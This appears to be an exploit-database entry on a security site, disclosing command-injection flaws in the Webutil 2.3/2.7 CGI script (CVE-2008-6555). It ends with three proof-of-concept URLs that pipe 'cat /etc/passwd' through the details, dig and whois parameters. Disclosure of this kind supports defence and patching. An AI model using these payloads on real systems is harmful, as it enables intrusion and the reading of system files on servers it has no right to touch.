[] NeoSense
E X P L O I T S
title author type platform port cve id

Webutil 2.3/2.7 - 'webutil.pl' Multiple Remote Command Execution Vulnerabilities

Author: Zero X
type: webapps
platform: cgi
port: 
date_added: 2008-03-21 
date_updated: 2014-02-07 
verified: 1 
codes: CVE-2008-6555;OSVDB-51181 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/28393/info

Webutil is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input.

Successful attacks can compromise the affected application and possibly the underlying computer.

These issues affect Webutil 2.3 and 2.7.

http://www.example.com/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.